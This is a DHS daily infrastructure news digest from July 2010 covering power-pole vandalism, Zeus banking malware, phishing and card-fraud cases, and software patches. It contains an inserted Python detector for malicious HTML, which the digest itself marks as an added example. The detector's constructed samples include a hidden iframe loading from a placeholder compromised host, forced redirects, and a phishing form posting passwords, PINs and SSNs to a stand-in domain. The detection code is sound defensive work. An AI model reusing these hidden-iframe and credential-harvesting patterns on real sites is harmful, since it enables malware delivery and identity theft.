Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, July 14, 2010

Complete DHS Daily Report for July 14, 2010

Daily Report

Top Stories

•According to the Associated Press, authorities in Franklin County, Illinois, say vandals used chain saws to cut down at least a half dozen rural power poles July 11, leaving residents and businesses without electricity. The poles included ones carrying 69,000-volt transmission lines.

2. July 12, Associated Press – (Illinois) Vandals use chain saws to down power poles. Authorities in Franklin County, Illinois, said vandals used chain saws to cut down several rural power poles, leaving dozens of residents and businesses without electricity. Investigators said at least a half dozen poles were brought down the evening of July 11 by vandals who, as of the afternoon of July 12, were still at large. The poles included ones carrying 69,000-volt transmission lines for Southern Illinois Power Cooperative and 12,500-volt distribution lines belonging to Southeastern Illinois Electric Cooperative. Electricity to most of the affected customers had been restored by the afternoon of July 12. Source:,0,5373085.story

•DarkReading reports that 38 defendants from across the United States have been charged with participating in a black market travel agent ring that used the stolen identities of thousands of victims to purchase airline tickets for customers, resulting in an estimated total loss of more than $20 million to numerous domestic airline companies, financial institutions, other merchants, and cardholders. See item 18 below in the Banking and Finance Sector.


Banking and Finance Sector

14. July 13, The Register – (International) Zeus baddies unleash nasty new bank Trojan. Hackers have created a new version of the Zeus crimeware toolkit that is designed to swipe bank log-in details for Spanish, German, U.K. and U.S. banks. The malware payload, described by CA as Zeus version 3, is far more selective in the banks it targets. Previous versions targeted financial institutions around the world, while the latest variant comes in two flavors: one that targets only banks in Spain and Germany, and a second that targets only financial institutions in the U.K. and U.S. In addition, the latest version of Zeus contains features that make it far harder for security researchers to figure out what the malware is doing. Zombie drones on the Zeus botnet operate on a need-to-know basis, CA explains. “In earlier versions, Zeus handles this configuration file in a way that security researchers can easily manage to reverse engineer and capture the actual full configuration content,” writes a senior research engineer with CA’s Internet Security Business Unit. “This is no longer the case for the latest Zeus bot version 3, which is already in the wild.” Command-and-control systems associated with the bot are “mostly hosted in Russia.” Source:

15. July 13, Computerworld – (International) IBM takes blame for massive bank system failure. IBM took responsibility for a major IT system failure suffered by one of Singapore’s largest banks July 5, saying an employee’s error caused the outage. In a statement released July 13, IBM said problems started when software-monitoring tools detected “instability” within DBS Bank’s storage system. While the storage system remained “fully functional,” IBM employees initiated a recovery process to fix the issue. “Unfortunately, a failure to apply the correct procedure inadvertently caused the service outage,” IBM said, adding that no data was lost. The outage knocked DBS’ IT systems offline for seven hours, leaving customers unable to withdraw money from automated teller machines. All of the bank’s commercial and consumer banking systems were affected, the bank said at the time. Source:

16. July 13, Sophos – (International) Malicious ‘Payment request from’ email attack strikes inboxes. Malicious hackers have spammed out the latest incarnation of a campaign designed to compromise computers, this time disguising their e-mails as payment requests from eBay. The e-mails have a blank message body but carry an attached file called form.html, and many people open the attachment to find out what the e-mail is about. Opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects the user’s Web browser to a page on a legitimate site that was recently compromised and infected with Mal/Iframe-Q. Two things then happen. First, the browser is redirected to a spam-related Web site, which may lead the user to believe the attack is merely designed to advertise medications on behalf of the spammers. However, a hidden iFrame on the compromised page also downloads further malware from other third-party Web sites, including versions of the ZBot family. Source:

17. July 12, CNN – (Virginia) Man falsely claiming to have explosive device taken into custody. A man who walked into a Wachovia bank in downtown Harrisonburg, Virginia, claiming falsely to have an explosive device on him has been taken into custody without anyone being hurt, police said July 12. The incident began at 9:18 a.m., when the man — with duct tape covering what appeared to be a bulky object on his back — walked into the bank and announced he had an explosive device, a spokeswoman for the Harrisonburg Police Department said. Employees and customers evacuated the building, after which — at about 10:30 a.m. — the man also walked out, the department said in a news release. No explosive device was found, the motive is unclear and no charges were filed, police said. Source:

18. July 12, DarkReading – (National) Feds indict 38 in alleged ‘black market travel agent’ ring. Thirty-eight defendants from across the United States have been charged with participating in a multimillion-dollar, black-market, travel-agent ring that used the stolen identities of thousands of victims to purchase airline tickets for customers. “What began as a local, law enforcement investigation ultimately exposed an extensive nationwide black market for airline tickets,” said the U.S. attorney for the Western District of Missouri. “Six federal indictments allege that 38 defendants used stolen credit and debit card information from thousands of identity theft victims to purchase tickets, which they sold to their customers at a steep discount,” the U.S. attorney explained. “These separate criminal conspiracies resulted in an estimated total loss of more than $20 million to numerous domestic airline companies, financial institutions, other merchants, and cardholders.” Conspirators used several strategies to obtain the credit and debit card information of identity-theft victims, according to the federal indictments. In some cases, conspirators allegedly purchased stolen information from unindicted co-conspirators in Bangladesh, Vietnam, and elsewhere. Some of the defendants allegedly stole customer information at hotels, a bank, and a customer call center where defendants were employed. This stolen identity information was allegedly used by other conspirators — identified as black market travel agents — to purchase airline tickets at no cost to themselves. They used computers and cell phones to make online purchases through the Web sites of various airlines, the indictments say, utilizing not only private Internet connections but also public Internet connections at airports, hotels, libraries, and other businesses. They often purchased reservations close to the time of departure in order to increase the likelihood their fraudulent purchases would not be detected, the indictments say. As a result, a passenger could often complete his or her trip before the credit or debit card was detected as being compromised. Source:

19. July 12, Brickhouse Security – (National) ATM skimmer attacks now targeting bank PIN numbers. Most people have heard about ATM skimmers — devices designed to look like, and fit over, an ATM’s card insertion slot. When an unsuspecting ATM user inserts a card through the dummy slot, the skimmer records a copy of the card’s magnetic stripe, making it easy for thieves to use the victim’s card as they please. However, a new twist on this scam not only copies card data but also captures PINs. The new tool is an overlay that sits on top of the ATM’s PIN pad and, like the card skimmer, gives users no visible sign that anything is out of the norm. The plastic PIN pad overlay captures each PIN as it is typed, and many models automatically send the stolen PINs by text message directly to the scammer’s cell phone. Since the data is transmitted remotely, the scammer never has to return to the scene of the crime to collect it, greatly reducing the risk of being caught. Source:

20. July 12, Denver Post – (National) Six indicted in Colorado on bank fraud charges. A national, bank-fraud ring, originally based in California, has been broken up in Colorado after a state grand jury indicted six of the members, the Colorado attorney general announced July 12. According to the indictment, the six individuals scammed thousands of dollars from Colorado banks and businesses. Also hit were banks and firms in Utah, Nebraska, North Dakota, Illinois, and Wisconsin. The indictment alleges the ring made fake credit cards and obtained 1-800 numbers, printed on the back of cards. When cashiers at the bank or sales people at the stores were unable to authenticate the fake credit cards, they would call the 800 number, which rang to other members of the ring, according to the indictment. The attorney general said ring members answering the phones would convince bank and store employees that the cards were legitimate, thus allowing for purchases and cash advances. Among the businesses hit were Enterprise Rent-a-Car in Aurora, Colorado and Revolution 2, a clothing store in Aurora. Among the Colorado banks targeted were the Dolores State Bank, Cortez; the Montrose Bank, Montrose; Valley Bank & Trust, Brighton; and the Colorado Community Bank in Castle Rock. The attorney general said losses exceeded $65,000. Source:

21. July 12, KTRK 13 Houston – (Texas) Suspected bank robber fatally shot by cop. A suspected bank robber is dead after being stopped by Pasadena, Texas, police July 12. At about 9:25 a.m., Pasadena police said the man entered the Chase Bank in the 5100 block of Fairmont Parkway. He placed a device on the counter that resembled a pipe bomb. Authorities said the man demanded money, got it and then fled. He was soon spotted by a Pasadena police officer responding to a silent alarm. The officer gave chase, demanding the suspect stop. The suspect ran to a nearby strip center, where the officer spotted him struggling to remove a gun from his waistband. Police said the officer repeatedly commanded the suspect to stop and he apparently did not. The officer, fearing the suspect might hurt someone in one of the businesses at the strip center, opened fire. The bank was evacuated because of the device the suspect placed on the counter. The bomb squad was called and a robotic device sent in to investigate. Police discovered an eight-inch piece of pipe wrapped in duct tape with electrical wires coming from it. It was safely removed for further inspection. No one in the bank was injured. Source:

Information Technology

44. July 13, Help Net Security – (International) iTunes users should strengthen iTunes passwords following second hack. It has been a second bad weekend for Apple, following another alleged app-driven hack of its iTunes store. iTunes users should now change the password on their iTunes account as well as switch to a prepaid debit card. Recent reports indicate a second hacker has been using an approach similar to that of the Vietnamese group, which appears to have ramped a range of apps with similar names to the top of a section on the App Store, said Fortify’s chief products officer. “Over the 4th of July weekend, a Vietnamese group used the same strategy to ramp its apps to the top of the book charts on the App Store. This time around it seems it’s the travel section that’s been hit,” he said. “The clever aspect of this hacking strategy is that iTunes members will see an app at the top of the charts and download it, if only to see what all the fuss is about, and then open themselves up to an obfuscated malware infection or, more likely, see their iTunes account details being lifted and misused,” he added. Source:

45. July 13, The Register – (International) Facebook for hackers shut down in Pakistan. Five alleged hackers have been arrested by Pakistani authorities in raids that led to the closure of the Pakbugs hacking and carding forum. The operation, run by the Cyber Crime department of Pakistan’s Federal Investigation Agency (FIA), followed complaints by “national and multinational organizations” over a series of Web site defacements and hack attacks. Pakbugs is blamed for running amok across thousands of Web sites belonging to various governmental and non-governmental organizations in Pakistan and elsewhere, local telecoms blog PakSpider reports. Police seized computer equipment during the arrests of the five suspects. A Pakistani government press statement said the suspects are thought to have expertise in a range of cybercrime techniques, including botnet management, phishing and carding. F-Secure noted that Pakbugs was a full-service cybercrime forum that offered a venue to discuss hacking techniques and a marketplace for the sale of malware code, bank logins and stolen credit card numbers. Last year, someone hacked into the forum and posted confidential information to a full-disclosure mailing list. The data posted included logins, e-mail addresses and password hashes, the Finnish net security firm said. Source:

46. July 13, Computer Weekly – (International) Microsoft’s July Patch Tuesday to fix zero-day vulnerabilities. Microsoft’s monthly Patch Tuesday security update due for release July 13 is small, with only four bulletins. Two address flaws in the Windows operating system and two address the Microsoft Office suite of productivity software. Both Windows bulletins have a maximum rating of critical, and both address previously disclosed vulnerabilities. The first is for Windows XP and Windows Server 2003 and fixes the Windows Help and Support Center vulnerability published by a Google security researcher in June. The second Windows bulletin fixes a problem in the display driver component used by the Aero interface on Windows 7 and Windows Server 2008 R2, which was disclosed publicly in May. The two remaining bulletins, one rated critical and one important, are for Microsoft Office. Apart from the recently released Office 2010, all versions of Office are affected, including Office XP, Office 2003 and Office 2007. The impact of the critical bulletin will be limited to businesses that have built applications and processes using Microsoft Access. Source:

47. July 13, Softpedia – (International) New AOL phishing campaign in the wild. Security researchers warn of a new phishing campaign targeting AOL users. Rogue e-mails claim that users need to update their personal and billing information in order to continue receiving services. Sophos reports that these phishing e-mails are sent indiscriminately but are tailored to AOL’s paying customers. The hxxp:// link actually points to a fake Web site hosted on a domain previously associated with other phishing schemes. Further investigation by Sophos researchers of the IP addresses and WHOIS information used in this attack revealed a different scam abusing Amazon’s affiliate payment system. “Some IPs associated with this attack are storing pre-populated WordPress SQL files containing all the wonderful fake comments about the products they purchased through this series of bogus blogs. All they need to do is search and replace a product name, import the SQL, and voila, instant website,” a senior security advisor at Sophos Canada explained. The phishing page copies elements of the real AOL Web site, but what stands out is the unusually high level of detail users are asked for. This scam’s victims will end up exposing their Social Security number, date of birth, driver’s license number and even their mother’s maiden name, a piece of information usually required by security questions. Source:
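The two Sophos items above (the eBay “payment request” attachment in item 16 and the AOL billing-update page here) describe the same two families of indicator an analyst looks for when triaging an HTML file from a suspicious e-mail: a forced browser redirect or hidden iFrame, and a form that asks for identity data no legitimate account page needs. The following Python script is an added example, not code from Sophos or from the original report; the two HTML documents it scans are constructed stand-ins (the hostnames, paths and field names are assumptions), and the list of sensitive field patterns is an illustrative starting point rather than a complete one.

```python
"""Static triage of an HTML e-mail attachment or phishing page.

Flags the indicators described in the Sophos items: browser redirects
(meta refresh or script-driven), hidden iframes, and form fields that
collect identity data. Added example; the sample documents below are
constructed for illustration and are not the actual files Sophos analysed.
"""
import re
from html.parser import HTMLParser

# Field-name patterns an ISP or auction site should not need on an
# "update your billing details" page. Field names are normalised to
# lower-case words before matching, so "card_pin" hits "pin" but
# "shipping" does not.
SENSITIVE_FIELDS = [
    (re.compile(r"\bssn\b|social"), "Social Security number"),
    (re.compile(r"\bdob\b|birth"), "date of birth"),
    (re.compile(r"licen[cs]e"), "driver's license number"),
    (re.compile(r"maiden"), "mother's maiden name"),
    (re.compile(r"\bpin\b"), "card PIN"),
]

# window.location = "..." / document.location.href = '...'
_JS_REDIRECT = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=\s*[\"']([^\"']+)", re.I)


class _Collector(HTMLParser):
    """Collects findings while html.parser walks the document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect: " + a.get("content", ""))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append("hidden iframe: " + a.get("src", ""))
        elif tag in ("input", "select", "textarea"):
            raw = (a.get("name") or a.get("id") or "").lower()
            name = re.sub(r"[^a-z0-9]+", " ", raw).strip()
            for pattern, label in SENSITIVE_FIELDS:
                if pattern.search(name):
                    self.findings.append(f"form collects {label}: {name}")
                    break
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self.script_text.append(data)


def scan_html(html):
    """Return a list of human-readable findings for one HTML document."""
    p = _Collector()
    p.feed(html)
    p.close()
    for m in _JS_REDIRECT.finditer("".join(p.script_text)):
        p.findings.append("script redirect: " + m.group(1))
    return p.findings


# Constructed stand-in for the blank-bodied e-mail's form.html attachment.
ATTACHMENT_SAMPLE = """<html><head>
<meta http-equiv="refresh" content="0;url=http://pharmacy.example/">
</head><body>
<iframe src="http://compromised.example/in.php" width="1" height="1"></iframe>
<script>window.location.href = "http://pharmacy.example/?ref=ebay";</script>
</body></html>"""

# Constructed stand-in for the AOL-themed billing-update form.
PHISH_SAMPLE = """<form action="http://aol-billing.example/update.php" method="post">
<input name="screen_name"><input name="password" type="password">
<input name="card_number"><input name="card_pin">
<input name="ssn"><input name="date_of_birth">
<input name="drivers_license"><input name="mothers_maiden_name">
<input name="shipping_address">
</form>"""

if __name__ == "__main__":
    for label, doc in (("form.html", ATTACHMENT_SAMPLE), ("aol-phish", PHISH_SAMPLE)):
        print(label)
        for finding in scan_html(doc):
            print("  -", finding)
```

A page with a single meta refresh is common enough on legitimate sites that each finding is a triage signal rather than a verdict; the attachment sample trips all three redirect-style checks at once, which is what makes it worth detonating in a sandbox rather than opening in a browser.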

48. July 12, – (International) Facebook users ‘trolled’ by World Cup mischief maker. Facebook users were warned to be on their guard against scammers July 12 after it emerged that 150,000 people were taken in by a Facebook FIFA World Cup 2010 group on the site which was set up by an online mischief-maker, or “troll.” The user set up the group at the beginning of the tournament, facilitating numerous discussions throughout the month-long event which attracted a large following, and chose the final whistle of the World Cup final to spring his surprise. “Well, the 2010 FIFA World Cup is over and thank f**k for that, because I F***ING HATE FOOTBALL,” he wrote on the group’s wall. Trend Micro’s senior security adviser warned that, although the hoaxer appears to have had no criminal intent, the incident proves that people need to be less trusting on social networking sites. Source:

49. July 12, eWeek – (International) Third-Party software bugs pose big danger, Secunia finds. Secunia concluded that a mistaken belief that Microsoft and the operating system are the primary attack vectors has caused some organizations to let their guard down when it comes to security for third-party applications. Software vendors need to do a better job of making it easy for users to update their computers, Secunia said. It is calling out application vendors for poor updating practices and reminding users that third-party software vulnerabilities — and not bugs in the operating system — are the main targets of attackers. In the Secunia Half Year Report 2010, the company said the number of vulnerabilities affecting the average end-user PC in the first half of 2010 reached 380, almost 90 percent of the total (420) found in all of 2009. Ten vendors — including heavyweights Microsoft, Apple and Oracle — are responsible for 38 percent of all vulnerabilities, Secunia said. Apple topped the list, followed by Oracle, Microsoft, Hewlett-Packard and Adobe Systems. For PC users, the threat of unpatched third-party apps is not abating. According to Secunia, a typical end-user PC with 50 programs installed had more than three times as many vulnerabilities in its 24 third-party programs as in its 26 Microsoft programs. Source:

50. July 12, IDG News Service – (International) Oracle to issue 59 critical patches. Oracle will release 59 patches July 13 to fix security weaknesses affecting hundreds of products, according to a Web site notice. Twenty-one vulnerabilities affect products in the Sun Solaris product line, which Oracle acquired through its purchase of Sun Microsystems. Seven can be exploited remotely over a network without requiring a password or username, Oracle said. The affected Sun products include OpenSSO, Solaris Studio, Sun Convergence and GlassFish Enterprise Server. The update also includes 13 patches for Oracle’s database product line. Seven are for remotely exploitable vulnerabilities in the TimesTen in-memory database component and the Secure Backup product. Those weaknesses received CVSS (Common Vulnerability Scoring System) scores of 10, the most severe on the scale. Seven other fixes target Fusion Middleware products. Another 16 are for E-Business Suite, PeopleSoft, JD Edwards and other applications. One patch is for an issue with Enterprise Manager. Oracle recommends that users apply the patches as soon as possible. Source:

For more stories, see items 15, 16, and 17 above in the Banking and Finance Sector

Communications Sector

51. July 13, The Register – (International) PegasHosting gets its wings clipped. A cybercrime-friendly Ukrainian ISP PegasHosting was partially taken offline July 13. The main range of IP addresses used by the ISP — which has been associated with hosting phishing mule scam sites and other criminal activity — has been null-routed, following action by one of its upstream providers. “Hosted web sites include fake pharmacies, fake job sites, hacking, porn and what appear to be fake dating sites,” security blog reports. “Blocking the entire ( - will probably do you no harm.” PegasHosting continues to operate through other IP ranges associated with two different upstream providers. Security campaigners are lobbying these providers, one of which feeds into Global Crossing, to pull the plug on PegasHosting. Source:

52. July 13, SourceWire – (International) Ipswitch survey reveals U.K. bandwidth use during World Cup surged to 95% of capacity. Ipswitch Inc.’s Network Management Division July 13 released the final results from its World Cup Network Traffic Calculator. Throughout the World Cup international soccer tournament, it collected over 1,200 responses about normal bandwidth use and the increases seen during the 30 days of the tournament. Key findings: In total, global bandwidth use increased by over a third during the World Cup; there was huge interest in offices of both finalist nations, with Spain seeing an increase of 95 percent, over five times what was predicted, and offices in Holland seeing bandwidth use hit 97 percent of capacity during their key matches; in the U.K., the actual increase was far worse than expected, with those surveyed citing a rise of 43 percent, to 95 percent of capacity, whereas network managers had originally predicted an increase of only 31 percent; average bandwidth use hit 81 percent in participating World Cup nations; Europe-wide bandwidth use almost doubled, from a 40 percent average to 76 percent during key match times; and even the U.S. was caught up in football fever over the past month, with bandwidth use rising to 77 percent during some key matches. Source:

53. July 12, Baltimore Sun – (Maryland) WTMD temporarily off the air: Power outage blamed. A power outage at Towson University in Maryland knocked radio station WTMD-FM off the air July 12, but the station went back on the air by 3:15 p.m. that day. A power outage that affected the entire campus was to blame for the outages affecting the FM signal and streaming services, according to a message on the station’s Web site. WTMD’s general manager said workers had been upgrading the network in the building that houses the station, so “we knew that streaming would be down.” Towson University is the license holder of the public radio station. Source:

54. July 12, Kittanning Paper – (Pennsylvania) Telephone service outage reported in South Bend Township. Windstream Telephone Company advised July 12 that approximately 150 customers in the South Bend Township area of Armstrong County, Pennsylvania, were without phone service. Those customers are not able to dial out on their landline telephones. Cell phones will still work. Those who do not have a cell phone or cell phone coverage can go to the Elderton Fire Department at 305 Williams Street. Source: